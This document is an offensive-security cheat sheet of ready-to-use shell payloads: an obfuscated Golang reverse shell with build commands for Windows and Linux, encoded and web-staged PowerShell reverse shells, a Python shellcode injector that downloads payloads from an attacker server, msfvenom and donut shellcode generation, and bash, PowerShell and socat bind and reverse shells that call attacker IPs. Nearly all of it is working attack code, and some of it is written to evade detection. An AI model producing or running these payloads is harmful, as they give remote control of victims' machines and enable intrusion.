###### Shells ###### ******* Generic ******* Golang Windows & Linux reverse shell ************************************ .. code-block:: golang package main import ( "C" "bufio" "errors" "flag" "fmt" "net" "os" "os/exec" "path/filepath" "runtime" "time" ) var dst string var abc []string = []string{"a", "e", "b", "c", "s", "/"} var webreq string = "GET /" + "george" + "/kindness HTTP/1.1\r\nHost:" + " reynolds.s3.amazonaws.com\r\nUser-Agent:" + " strawberry/0.2.1\r\nAccept:" + " application/json\r\n\r\n" func GardnerFileExist(filePath string) bool { _, error := os.Stat(filePath) return !errors.Is(error, os.ErrNotExist) } //export EdwardsDial func EdwardsDial() { conn, err := net.Dial("t"+"c"+"p", dst) if err != nil { time.Sleep(time.Duration(1000 * time.Millisecond)) EdwardsDial() return } fmt.Fprintf(conn, webreq) // Fake HTTP Request bufio.NewReader(conn).ReadString('\n') // Wait for any response bin := []string{abc[3] + "m" + "d" + "." + abc[1] + "x" + abc[1]} if runtime.GOOS != "windows" { bin = []string{abc[5] + abc[2] + "i" + "n" + abc[5] + abc[2] + abc[0] + abc[4] + "h", "-" + "i"} if GardnerFileExist(bin[0]) { // Check if file exist testbin := []string{abc[5] + "u" + abc[4] + "r" + abc[5] + abc[2] + "i" + "n" + abc[5] + abc[4] + abc[3] + "r" + "i" + "p" + "t", abc[5] + "d" + abc[1] + "v" + abc[5] + "n" + "u" + "l" + "l", "-" + "q" + abc[3], bin[0]} if GardnerFileExist(testbin[0]) { bin = testbin } } else { bin = []string{abc[5] + abc[2] + "i" + "n" + abc[5] + abc[4] + "h"} } } cmd := exec.Command(bin[0], bin[1:]...) cmd.Stdin, cmd.Stdout, cmd.Stderr = conn, conn, conn cmd.Run() } //export PalmerDetach func PalmerDetach() { cwd, _ := os.Getwd() if runtime.GOOS == "windows" { cwd, file := filepath.Split(os.Args[0]) bin := []string{abc[3] + "m" + "d" + "." + abc[1] + "x" + abc[1], abc[5] + abc[3], abc[4] + "t" + abc[0] + "r" + "t", abc[5] + abc[2], file, "-" + "-" + "child"} cmd := exec.Command(bin[0], bin[1:]...) 
cmd.Dir = cwd cmd.Start() cmd.Wait() } else { cmd := exec.Command(os.Args[0], "-"+"-"+"child") cmd.Dir = cwd cmd.Start() time.Sleep(time.Duration(1000 * time.Millisecond)) cmd.Process.Release() time.Sleep(time.Duration(1000 * time.Millisecond)) } } func main() { var isChild = flag.Bool("child", false, "run as child") flag.Parse() if !*isChild { PalmerDetach() // Detach program from parent terminal } else { EdwardsDial() // ReverseShell part } os.Exit(1) } .. code-block:: bash LHOST="192.168.45.245" LPORT=53 env GOOS=linux GOARCH=amd64 CGO_ENABLED=0 /usr/local/go/bin/go build -o r -ldflags "-X main.dst=$LHOST:$LPORT" main.go env GOOS=windows GOARCH=amd64 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -o r.exe -ldflags "-X main.dst=$LHOST:$LPORT" main.go env GOOS=windows GOARCH=386 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -o r32.exe -ldflags "-X main.dst=$LHOST:$LPORT" main.go env GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -ldflags "-s -w -X main.dst=$LHOST:$LPORT" -buildmode=c-shared -o r.dll main.go sudo mv r.exe r32.exe r.dll r /var/www/html/ cat <$F;chmod 755 $F;$F # Windows x86 shellcode CMD='powershell "wget 192.168.45.245/r32.exe -o $env:TEMP\r.exe;saps $env:TEMP\r.exe"' msfvenom -a x86 --platform Windows -p windows/exec CMD="$CMD" -f python -b "\x00\x20" --smallest -v shellcode EXITFUNC=thread | | DLL loader example .. 
code-block:: golang package main import ( "flag" "fmt" "syscall" ) func main() { var mod = syscall.NewLazyDLL("main.dll") var isChild = flag.Bool("child", false, "run as child") var proc = mod.NewProc("EdwardsDial") flag.Parse() if !*isChild { proc = mod.NewProc("PalmerDetach") } ret, _, _ := proc.Call() fmt.Printf("Return: %d\n", ret) } | ******* Windows ******* PowerShell Python Reverse TCP (web staged) ******************************************* | You need the embeddable Python zip from https://www.python.org/downloads/windows/ and must serve it as python.zip .. code-block:: bash cat <<'EOF'| sudo tee /var/www/html/rs.ps1 $ip="192.168.1.163"; $port=53; $process="powershell.exe" $python="http://$ip/python.zip"; $dir="$env:TEMP";$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")} $arguments=@("-c","""import time,socket,os,threading,subprocess as sp;p=sp.Popen(['$process'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('$ip',$port));threading.Thread(target=exec,args=('while(True):o=os.read(p.stdout.fileno(),1024);s.send(o);time.sleep(0.01)',globals()),daemon=True).start();threading.Thread(target=exec,args=('while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i);time.sleep(0.01)',globals())).start()""") Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments EOF .. code-block:: bash sudo nc -nvlp 53 -s 192.168.1.163 ..
code-block:: bash cat << 'EOF'|iconv -f UTF8 -t UTF16LE | base64 -w 0 IEX(New-Object Net.WebClient).downloadString('http://192.168.1.163/rs.ps1') EOF powershell -E AAAAAAAAAAAAAA== # Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "AAAAAAAAAAAAAA==" | Shellcode w/ Python (web staged) ********************************* | ref: https://github.com/ustayready/python-pentesting/blob/master/pyinjector.py .. code-block:: bash cat <<'EOF'| xxd -plain | tr -d '\n' | rev | sudo tee /var/www/html/loadsc import ctypes as c import gzip import io import urllib.request as r def load(url): k32 = c.windll.kernel32 k32.VirtualAlloc.restype = c.c_void_p ct = k32.CreateThread ct.argtypes = ( c.c_int, c.c_int, c.c_void_p, c.c_int, c.c_int, c.POINTER(c.c_int) ) ct.restype = c.c_void_p buff = bytes.fromhex(gzip.open(io.BytesIO(r.urlopen(url).read()),'rb').read()[::-1].decode("utf-8")) lenbuff = len(buff) space = k32.VirtualAlloc(c.c_int(0),c.c_int(lenbuff),c.c_int(0x3000),c.c_int(0x40)) buff = ( c.c_char * lenbuff ).from_buffer_copy( buff ) k32.RtlMoveMemory(c.c_void_p(space),buff,c.c_int(lenbuff)) buff = "" ; del buff handle = ct(c.c_int(0),c.c_int(0),c.c_void_p(space),c.c_int(0),c.c_int(0),c.pointer(c.c_int(0))) k32.WaitForSingleObject(handle, -1); EOF | Call it with Python .. code-block:: powershell &$env:TEMP\python\python.exe -c "import urllib.request as r;exec(bytes.fromhex(r.urlopen('http://192.168.1.163/loadsc').read()[::-1].decode('utf-8')));load('http://192.168.1.163/sc')" | | Or call it with Start-Process if you don't want interaction (this payload also downloads python.zip) ..
code-block:: bash cat <<'EOF'| sudo tee /var/www/html/loadsc.ps1 $ip="192.168.45.245"; $loadsc="http://$ip/loadsc"; $sc="http://$ip/sc" $python="http://$ip/python.zip"; $dir="$env:TEMP";$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")} $arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""") Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments EOF # IEX(New-Object Net.WebClient).downloadString('http://192.168.45.245/loadsc.ps1') | | Use donut to "convert" your exe to shellcode .. code-block:: bash pip3 install donut-shellcode --break-system-packages python3 -c "import donut; donut.create(file='SweetPotato.exe',output='/tmp/sc',params='--help')" cat /tmp/sc | xxd -plain | tr -d '\n' | rev | gzip | sudo tee /var/www/html/sc >/dev/null # test : msfvenom -p windows/x64/exec CMD="calc.exe" -f raw | xxd -plain | tr -d '\n' | rev | gzip | sudo tee /var/www/html/sc >/dev/null | PowerShell Reverse TCP ********************** .. code-block:: bash # Attacker Listen 443 sudo nc -nvlp 443 .. code-block:: bash # Generate PowerShell command to execute on target export LHOST="4.3.2.1" export LPORT="443" echo -en "\npowershell -nop -noni -w Hidden -ep Bypass -e $( echo ' $c=New-Object Net.Sockets.TcpClient("'$LHOST'",'$LPORT') $s=$c.GetStream() $sb=([Text.Encoding]::UTF8).GetBytes("PS "+(pwd).Path+"> ") $s.Write($sb,0,$sb.Length) [byte[]]$b=0..65535|%{0} while(($i=$s.Read($b,0,$b.Length)) -ne 0){ $d=(New-Object -t Text.UTF8Encoding).GetString($b,0,$i) $sb=(iex $d | Out-String) 2>&1 $sb2=$sb+"PS "+(pwd).Path+"> " $sb=([Text.Encoding]::UTF8).GetBytes($sb2) $s.Write($sb,0,$sb.Length) $s.Flush() } $c.Close() ' | iconv -f utf8 -t utf-16le | base64 -w0) \n\n" .. 
code-block:: powershell # Result Example powershell -nop -noni -w Hidden -ep Bypass -e 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 | PowerShell Reverse TCP (web staged) ************************************ .. code-block:: bash # Attacker Listen 443 sudo nc -nvlp 443 .. code-block:: bash # Serving PS ReverseShell on http://*:80/rs.ps1 LHOST="4.3.2.1" LPORT="443" cd $(mktemp -d) && \ echo '$client = New-Object System.Net.Sockets.TCPClient('"'$LHOST'"','$LPORT');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + '"'PSReverseShell# '"';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();'>rs.ps1 && \ sudo python3 -m http.server --cgi 80 .. code-block:: batch :: Victim, retrieve and launch rs.ps1 c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://4.3.2.1/rs.ps1') | PowerShell bind shell ********************* | .. code-block:: bash cat << 'EOF'|iconv -f UTF8 -t UTF16LE | base64 -w 0 $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',8888);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop() EOF # powershell.exe -E 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 # nc 1.2.3.4 8888 | ***** Linux ***** Bash Reverse TCP **************** ..
code-block:: bash # Attacker Listen 443 sudo nc -nvlp 443 .. code-block:: bash # Victim Connect 443 bash -c "bash -i >& /dev/tcp/4.3.2.1/443 0>&1" | Socat Bind TCP Shell (encrypted) ******************************** | Establish an encrypted bind shell with socat and a certificate (certificate + private key) .. code-block:: bash # Victim - Regroup cert and key cat server.key server.crt > server.pem # Victim - Listen 443 sudo socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork EXEC:/bin/bash # Attacker - Connect 443 socat - OPENSSL:10.11.0.4:443,verify=0 #Skip certificate check |